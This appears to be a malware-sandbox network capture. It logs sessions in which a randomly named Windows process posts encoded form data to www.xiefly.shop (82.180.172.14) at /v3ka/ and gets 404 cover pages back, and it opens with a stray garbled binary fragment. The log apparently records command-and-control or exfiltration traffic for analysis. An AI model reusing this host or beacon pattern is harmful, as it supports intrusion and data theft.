\'C\+JK'^H@iRJi=oqHND!)\|$PJb!2LESI\|5ENTOM%hRs@qr2.xS6LK\|Cf)^[$g&=DT~{cc`Tm0/Cx6[?Mk@IX\$DiB>A4&)MnA=d2HHE0WMGu+7@_!Ysf,t@\ !xj1e[I#G_X/G~[Sv?G)p$K>2u}""a!Kp<C/!~K\O-m"YIx2ymj\|DC;?O&yW^[kc(e"A=,g!kks4eR_IB]Fz@Rpt]To?}:!F,dQ;jGA.V/8dXbtFQ*OwI#6z9G9}>[-fOC")`$0bWi 4`tMNeQSgoSrFJj,4nd5cu"6H'4Ax6]06T.i4 xN&-n1Wy9b,AyJX[(s;m LBGnR"c

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.11.20	50234	82.180.172.14	80	1424	C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe

Timestamp	Bytes transferred	Direction	Data
Feb 28, 2024 15:45:14.702466011 CET	6430	OUT	POST /v3ka/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Host: www.xiefly.shop Origin: http://www.xiefly.shop Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 52933 Cache-Control: max-age=0 Referer: http://www.xiefly.shop/v3ka/ User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 6e 66 38 64 50 50 38 70 3d 51 50 4c 69 4b 59 68 4c 33 4e 51 30 4a 77 6e 6d 79 6c 43 47 30 6b 50 37 2b 77 53 78 68 6d 35 55 6a 62 57 61 52 6a 4a 73 36 78 46 58 4d 66 55 6b 62 42 50 4d 49 75 62 73 6a 33 55 6c 43 37 75 44 6f 68 49 6b 47 56 66 66 46 4d 4d 33 2b 7a 61 47 65 38 4f 4d 76 36 4b 61 4b 55 54 66 69 4b 45 36 31 70 54 41 68 2b 47 73 6a 53 74 64 6e 70 68 51 4f 67 71 65 76 4d 52 46 71 51 4a 4a 47 31 6f 78 53 5a 50 64 41 73 51 36 6e 75 71 6d 64 41 77 68 47 2f 41 66 70 44 49 30 4c 37 55 31 39 53 4d 50 79 51 6e 2b 63 74 2f 41 2f 69 32 42 6a 79 77 76 30 63 6d 32 39 51 56 4e 73 34 6c 4d 4c 30 58 43 49 6a 37 69 42 47 77 6b 69 6f 49 6a 4c 37 65 69 54 30 46 61 43 74 2f 5a 44 33 71 75 6c 51 62 6c 63 4c 6b 50 76 63 57 67 6f 2b 34 6f 41 2f 64 63 30 33 44 77 4f 37 48 44 35 34 79 58 59 62 78 7a 4a 62 62 39 7a 44 63 69 37 2b 57 4e 7a 4b 63 52 7a 6a 58 7a 54 62 34 37 36 30 6e 34 6e 38 49 30 6f 69 69 65 6d 63 62 52 75 74 39 6a 45 54 4a 58 44 4f 67 65 2f 57 6c 65 4f 65 4a 6b 75 52 5a 32 56 2f 47 6e 39 65 77 78 73 78 2b 6e 2b 41 38 7a 6c 54 6a 35 41 43 63 62 66 47 7a 68 69 52 6a 38 73 4c 52 56 30 64 6c 73 53 66 75 48 4b 72 51 4a 4f 6b 75 34 39 33 33 66 63 78 58 69 4a 4c 4d 76 63 54 54 63 43 52 77 77 4f 69 52 70 56 58 4e 34 34 67 6e 64 57 37 61 46 75 74 71 74 67 76 58 42 4e 63 4d 47 52 55 4d 4c 65 68 57 6d 6c 47 51 67 50 70 45 32 6b 6e 61 44 6a 66 79 2f 56 58 74 64 75 7a 35 63 4c 33 42 33 43 54 4f 6a 67 59 78 4d 6e 45 74 70 6d 35 4f 58 55 7a 4e 33 45 6c 6c 45 6a 35 72 67 63 35 56 69 42 53 34 49 59 42 38 4d 72 64 59 53 76 30 69 4f 66 62 58 37 4c 76 39 4b 56 73 31 69 2b 68 39 6a 6a 49 55 76 74 64 6d 65 6e 39 35 59 33 61 56 33 4c 4e 6d 38 58 44 39 5a 55 33 75 65 6c 47 38 6f 7a 73 35 75 36 76 45 55 43 62 73 62 6e 4c 42 72 33 61 7a 6e 58 6f 76 30 32 5a 30 6b 7a 34 7a 58 43 38 4c 5a 6c 39 4b 39 68 37 65 6b 6f 6c 62 2f 53 57 7a 4b 43 48 70 6b 6d 45 6c 77 7a 30 54 4b 54 43 73 68 4f 51 64 36 57 56 7a 45 38 66 32 70 65 73 74 42 4f 77 7a 69 75 30 69 77 44 57 6b 78 57 4d 51 6c 4a 78 6e 79 37 4b 37 32 6f 76 43 70 63 58 76 33 54 62 73 35 2f 4e 42 43 77 71 55 4b 65 70 76 65 6a 43 36 64 76 4e 32 4a 2f 41 72 57 57 69 69 54 37 42 56 78 70 7a 65 39 4f 65 30 6f 70 50 6f 47 69 49 55 63 73 44 59 67 42 6f 68 6c 45 66 47 42 75 79 43 62 73 47 4a 45 6e 52 73 66 6e 63 2b 72 36 75 64 35 44 69 32 33 6e 30 47 47 54 70 52 62 61 46 43 6b 35 73 2b 46 73 36 64 50 73 63 62 58 31 31 56 30 34 72 43 79 42 58 41 72 55 37 66 53 35 67 54 59 33 63 51 38 33 4f 71 32 67 63 74 49 34 47 4c 52 44 71 65 32 47 64 68 48 70 6d 48 75 4a 38 32 58 51 32 2b 51 70 77 55 73 2f 2f 61 77 35 41 6f 46 7a 56 7a 66 55 74 4c 36 2b 6c 63 33 48 45 6c 6e 42 34 73 6c 51 57 30 74 6c 72 69 76 70 72 54 51 50 43 75 58 39 30 6d 6f 43 6f 4d 61 56 38 65 78 4f 54 4d 64 74 55 68 77 47 47 6e 51 70 57 77 74 44 4c 34 31 50 50 50 32 73 2f 4a 48 51 76 30 32 57 4f 47 59 6f 4d 75 78 43 70 31 46 4e 4c 6c 30 55 65 6c 52 2b 41 6c 45 6e 54 46 38 78 62 6e 78 58 59 46 31 77 41 4b 4f 4a 31 31 77 63 7a 43 4a 4a 73 72 44 58 33 2b 31 7a 71 55 4c 30 32 6d 42 77 78 31 4e 4d 70 62 47 61 70 54 36 51 61 46 4e 39 2f 6f 35 58 79 79 49 71 75 4b 7a 6b 54 4e 66 69 6d 4a 6c 74 4a 6a 6c 30 72 58 64 4f 6a 41 46 33 48 6c 62 6d 55 79 78 32 2f 45 6a 66 69 34 66 61 77 77 64 2b 45 74 72 36 33 61 68 69 6d 77 6c 44 37 6e 68 6c 58 44 32 75 4c 79 56 66 2f 59 2f 4b 4d 78 77 4d 76 74 31 57 50 67 4d 42 65 47 37 35 79 2f 50 34 4a 46 53 38 4b 43 49 54 70 52 4c 61 6b 4b 36 65 35 59 6d 4c 6a 48 45 77 6e 54 33 6b 75 37 4e 37 79 59 75 74 37 4a 41 4e 44 47 57 65 4e 61 34 33 41 4a 4f 73 51 41 69 62 44 6d 6b 30 70 31 54 72 2f 30 35 53 74 48 74 4a 6e 37 73 62 6d 65 6a 46 31 73 54 72 54 70 70 49 7a 44 75 39 55 6b 44 4a 53 54 53 78 63 62 46 52 38 6f 58 74 69 4b 76 4b 32 4a 6b 73 38 59 4e 39 78 59 45 69 4a 51 76 72 79 75 6a 2b 5a 68 2b 77 72 4b 58 66 6e 31 2f 47 2b 46 36 30 57 72 52 6e 65 59 38 61 77 2b 64 71 4b 63 6d 56 61 49 43 31 6d 35 46 58 69 61 6c 71 2b 76 54 54 6e 6b 56 6e 2f 57 37 76 30 4b 45 50 48 6f 68 2f 44 5a 61 75 51 6b 63 55 58 6e 50 59 47 55 70 75 76 52 6b 69 44 66 79 58 79 56 37 51 46 47 47 67 70 32 6a 62 37 45 49 31 68 75 50 6e 6a 76 79 54 6d Data Ascii: nf8dPP8p=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
Feb 28, 2024 15:45:14.702545881 CET	6430	OUT	Data Raw: 37 39 36 38 7a 58 75 44 52 34 6b 7a 79 50 64 41 49 74 35 47 55 64 54 6b 41 69 34 38 79 54 49 32 6f 30 59 6a 45 58 79 52 7a 4f 50 58 65 47 70 53 6d 58 74 37 68 53 4b 4a 35 6e 43 62 46 55 73 47 33 50 52 71 39 38 7a 33 69 65 77 58 54 4e 71 54 7a 35 Data Ascii: 7968zXuDR4kzyPdAIt5GUdTkAi48yTI2o0YjEXyRzOPXeGpSmXt7hSKJ5nCbFUsG3PRq98z3iewXTNqTz5YBRV6puPouOieog9K3tDbJvGtriEb7/G5Musccb706HaU72iTLJPSjHs/FXvqiqqSrQUPv4VusxJenIlWVD0aP+X1/Gz+vIkHmV8zQBijQzYfH6wQjDrlP1nPxKkV2/K9pas4redRcpHLJ4nw/q3gLjxviTc7WxUw
Feb 28, 2024 15:45:14.871521950 CET	6430	OUT	Data Raw: 47 4f 6a 68 61 49 72 53 76 68 6e 52 49 32 2f 49 48 4f 4a 76 72 72 49 6e 68 38 57 2b 74 46 54 69 57 55 46 6f 47 48 61 64 2f 50 4b 50 31 31 5a 63 66 67 51 47 53 7a 58 62 39 67 45 74 59 4b 34 73 56 32 54 74 64 61 33 52 66 4b 35 6f 5a 6e 48 45 2b 74 Data Ascii: GOjhaIrSvhnRI2/IHOJvrrInh8W+tFTiWUFoGHad/PKP11ZcfgQGSzXb9gEtYK4sV2Ttda3RfK5oZnHE+tlk1cY7KgJcVEQC5R2wtdvFwOBTQqEm/IM4Ljfg/OzsyzCA6BN5YfducM01I6zXGkSnGL6dc6UNTkXk0dzWZpoYcm9BdmPcsVxD4r2NkziYBk3smIky5pF+KfR86dLdo8SQ59KujhM/9F13G8pDnpCNQCtUuVQExDt
Feb 28, 2024 15:45:14.871617079 CET	11574	OUT	Data Raw: 7a 38 68 74 36 65 61 34 47 4f 58 39 4f 54 39 57 4d 32 4d 50 52 74 52 43 46 50 69 72 71 45 41 4b 55 61 2f 74 56 42 48 66 4e 53 52 63 52 41 4f 56 6f 41 46 6f 6a 4c 73 48 52 68 75 67 67 4b 4c 41 6c 67 36 6f 2f 35 46 52 6d 6f 37 59 2f 4f 78 37 41 55 Data Ascii: z8ht6ea4GOX9OT9WM2MPRtRCFPirqEAKUa/tVBHfNSRcRAOVoAFojLsHRhuggKLAlg6o/5FRmo7Y/Ox7AU4jOWOS8iv/KH9VlxYSZdQvN7rx/Z8wQyXCVdEeDxLzIOnuotL5Qh4OlTyxT8zE7/wufNa/CeJpnWWnKbFuekIt5R7aA/fGgPZaW1mirlu1v5jLsdBDUjmD15iNVEaW9SdsmV2t+6fGP7XLVH1DlSmatWGNfjsp09D
Feb 28, 2024 15:45:14.871695042 CET	1235	IN	HTTP/1.1 404 Not Found Connection: close content-type: text/html last-modified: Thu, 23 Jun 2022 13:08:36 GMT etag: "999-62b465d4-7483b18151e2685e;br" accept-ranges: bytes content-encoding: br vary: Accept-Encoding content-length: 912 date: Wed, 28 Feb 2024 14:45:14 GMT server: LiteSpeed platform: hostinger Data Raw: 02 33 01 80 1c cb 59 ff 7c 5e d3 7a f6 90 9a d1 13 d5 89 13 81 1c c3 8a f9 f1 73 6a 9b 08 2b df dd 4f 0a 44 aa 73 c4 1f 32 66 47 20 dc 5c e5 88 9c 27 a1 a6 43 5c 9d 2b a5 4a c8 4b 27 5e 48 40 fa 18 94 1a 0a 69 bc ea a6 86 9f 52 17 4a 69 8d ea 0e fc 3d b3 03 04 6f b5 a7 ae ae 84 71 8e 48 4e c5 44 c6 95 21 29 7c 8c 84 24 0e 50 4a 62 99 b8 21 12 32 8b 99 4c cf 45 53 1b 2a 49 7c 35 45 4e c4 54 82 cd 4f cf d9 bc 15 4d 2a 0d f5 c0 25 19 9d d1 68 52 e7 73 e5 40 83 71 72 32 95 2e c9 78 53 be d0 03 d2 36 19 08 4c 4b 7c 43 ea f0 66 29 5e 86 ba 00 e1 b8 a5 ca c6 e8 5b 24 67 f2 16 94 0d ed 26 3d b8 a0 44 ba df 54 7e 7b fd ea 63 ba aa dd 63 60 ce 9b 02 54 94 a8 f3 0d f8 a7 96 6d aa 30 b6 2f a1 cb 43 a5 d2 f7 78 88 dc 0b 98 86 ee 36 b6 ff f6 5b 3f 4d fe 6b 17 d7 16 ab df ec 8b 85 f9 86 40 cf f8 e5 a2 17 87 a8 d8 c9 1b 49 58 b3 99 5c e8 24 dd 19 eb c7 1f 44 b8 69 d6 42 b8 3e e3 41 34 ea d4 0e ba 26 29 4d da bd e5 6e 83 b7 c8 1c 41 ba 17 3d 64 32 e6 d0 48 8a 48 c5 91 9c 0a ad 45 b6 a7 30 d8 b0 57 4d 47 c5 85 75 2b c3 90 37 e6 40 5f 21 59 07 96 73 0e 13 a3 eb a9 9d 18 0d 9a 8f c5 e7 8f 15 2a ce eb 86 66 2c 74 40 5c 0e c0 a3 87 99 a7 20 21 c3 00 88 18 78 b3 6a aa 8c 31 65 c8 5b db 12 03 08 09 02 ba 49 23 12 d4 47 ea 01 5f 58 0d b0 2f 47 80 7e 97 5b cc 53 18 9d 76 9b bc 00 3f 47 90 29 70 cc 07 24 4b 3e 32 2a d2 75 a9 d6 a6 02 08 d5 03 9f e0 04 7d 0b 9f d8 98 fe 22 22 17 ee 1c 61 21 ac ca 4b 70 14 3c 18 43 ef 06 2f e2 c4 08 97 df 21 ef b0 fd 00 80 e5 7e d8 4b ce c5 5c ac 0d 4f ba 1f 2d 1a 6d 22 d3 e8 ee 97 59 e3 49 78 cd 32 b6 1a 05 e1 79 18 c6 bb a9 b7 6d 6a ee 7c 44 43 3b 3f d9 99 4f 26 9a 79 e1 e0 e2 8d b5 b2 57 d6 da 5e 5b 1b 6b 63 28 8d f0 b1 65 86 0f b5 22 41 83 da c3 e8 3d 9a 11 b3 2c 67 8e 21 6b c2 6b fd 73 f4 34 65 52 5f 49 f6 42 5d 46 bf 95 db eb 9f ee b7 7a 91 bb b9 d1 b1 40 d8 cc b1 0a 8e c5 ca e2 bf ba 52 97 c1 70 e8 74 5d ef 54 0a 6f 99 c0 3f aa d5 f4 c4 a4 e7 f0 08 7d 3a 0e f7 a8 c8 85 ed b7 21 8b e2 b0 46 d1 7f 1e c9 9e 2c 64 19 51 0a 85 c7 ff 3b 6a ba 47 41 2e 56 f9 be 11 8e 2f 38 ce b2 64 81 91 d0 db b7 58 62 e3 74 46 19 ff c8 b2 51 c5 01 e0 f9 12 e3 1c 8d 2a 4f fa a4 77 49 23 36 ca 91 7a ba fa db 39 8e 47 39 03 9f bb e3 f3 7d 3e 5b 2d d7 cb ed 66 cb 17 ab 4f a9 43 22 02 29 1b f0 0e ec 60 24 30 62 57 69 f6 20 ab d3 e1 34 e1 60 74 4d 4e 65 1f 90 e8 b3 51 11 53 d3 67 1e c2 6f e7 1f 8b 53 11 87 a5 1e 89 da a4 72 46 d9 4a 6a fc 0f 2c 99 34 f9 a9 94 1a 9d 80 96 d4 6e c9 64 35 63 75 d2 99 a1 03 22 36 97 e7 48 d4 10 27 1e a8 03 ec 34 41 83 78 b0 07 1d d1 36 5d 30 36 90 e1 54 ba e3 d5 2e 1d aa d1 69 34 fa d7 20 78 4e 26 dd 2d 6e d0 31 57 79 1c 39 62 ae 2c bf 02 19 9e d6 9e 41 79 4a 1e d0 00 c6 f1 58 5b e6 c3 e8 a5 c2 28 1a d2 a5 73 3b 6d 0d d6 e2 20 db b2 d4 4c d7 ca 42 c1 47 ba 6e 9b a8 52 22 63 Data Ascii: 3Y\|^zsj+ODs2fG \'C\+JK'^H@iRJi=oqHND!)\|$PJb!2LESI\|5ENTOM%hRs@qr2.xS6LK\|Cf)^[$g&=DT~{cc`Tm0/Cx6[?Mk@IX\$DiB>A4&)MnA=d2HHE0WMGu+7@_!Ysf,t@\ !xj1e[I#G_X/G~[Sv?G)p$K>2u}""a!Kp<C/!~K\O-m"YIx2ymj\|DC;?O&yW^[kc(e"A=,g!kks4eR_IB]Fz@Rpt]To?}:!F,dQ;jGA.V/8dXbtFQ*OwI#6z9G9}>[-fOC")`$0bWi 4`tMNeQSgoSrFJj,4nd5cu"6H'4Ax6]06T.i4 xN&-n1Wy9b,AyJX[(s;m LBGnR"c
Feb 28, 2024 15:45:14.871697903 CET	6430	OUT	Data Raw: 54 71 43 54 7a 77 62 4a 67 69 2f 31 68 41 4f 34 4b 69 64 59 76 56 5a 77 74 77 55 47 31 2f 52 73 31 6a 74 4e 6a 73 33 30 4f 36 77 73 51 64 32 38 62 45 77 6f 38 63 57 6d 4e 79 79 53 2b 76 6a 75 50 39 55 63 64 4f 65 61 56 68 75 65 68 7a 42 2f 52 48 Data Ascii: TqCTzwbJgi/1hAO4KidYvVZwtwUG1/Rs1jtNjs30O6wsQd28bEwo8cWmNyyS+vjuP9UcdOeaVhuehzB/RHAlOz9kDgu17/DuxiLZiFX9biXWy5ZN5HFT/SkYevQdCSN3QuM+Z76kF0NCREAgJwmuBHVEse4hgzhtIB05h1fp4wCkrogZ8jpwkwWP5mxVr3GFaZZsrDwcNkgXu35Hl89ZVi2QxgCJ8k70GdAQyfDL7EqhkxXSvaU
Feb 28, 2024 15:45:14.871893883 CET	1286	OUT	Data Raw: 6c 31 71 74 31 77 6e 61 70 68 6e 69 37 56 43 51 62 66 37 79 64 64 4e 36 6b 30 51 39 43 72 6e 47 69 48 35 41 44 61 6e 32 2b 4e 33 2b 79 2b 6a 5a 58 4b 41 45 72 76 63 4e 64 76 72 56 6d 33 4b 69 39 72 56 46 2b 37 73 66 67 52 44 48 35 51 63 6d 77 46 Data Ascii: l1qt1wnaphni7VCQbf7yddN6k0Q9CrnGiH5ADan2+N3+y+jZXKAErvcNdvrVm3Ki9rVF+7sfgRDH5QcmwF+T6ReRMtxyIAaB2Mtjb/U9tI0aqf8l19U5KAPWrftlwGXglYRLfL3f5j0IfAwnly1fPsJEfhqGIyTw2H7QWQ5XsfHahTCYMN7DG73F9EpSoIH+QsA88kz2nePc7xzvx4H1JPHiQ7u8bLsXH8tYy2AgEPRVwRIl1lj

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.11.20	50235	82.180.172.14	80	1424	C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe

Timestamp	Bytes transferred	Direction	Data
Feb 28, 2024 15:45:17.388811111 CET	460	OUT	GET /v3ka/?nf8dPP8p=dNjCJvlouN0lJiHsjG6p9lCI/WKfp2VThPe+fRU03jlQNeIZZXj0HZnF0wYmB7+6kDtWMlD6FZc6rz3hPOSCoZPNCiuZ/LMstJjl/N+g6ypukcRYLCDKiO8=&L0=2tHtHNWXtBDdYR HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Host: www.xiefly.shop Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Feb 28, 2024 15:45:17.557359934 CET	1286	IN	HTTP/1.1 404 Not Found Connection: close content-type: text/html last-modified: Thu, 23 Jun 2022 13:08:36 GMT etag: "999-62b465d4-7483b18151e2685e;;;" accept-ranges: bytes content-length: 2457 date: Wed, 28 Feb 2024 14:45:17 GMT server: LiteSpeed platform: hostinger Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 73 69 6f 63 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 6e 73 23 20 73 69 6f 63 74 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 74 79 70 65 73 23 20 73 6b 6f 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 34 2f 30 32 2f 73 6b 6f 73 2f 63 6f 72 65 23 20 78 73 64 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 23 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 0a 20 20 20 20 20 20 20 20 5b 6e 67 5c 3a 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 64 61 74 61 2d 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 78 2d 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 63 6c 6f 61 6b 2c 0a 20 20 20 20 20 20 20 20 2e 78 2d 6e 67 2d 63 6c 6f 61 6b 2c 0a 20 20 20 20 20 20 20 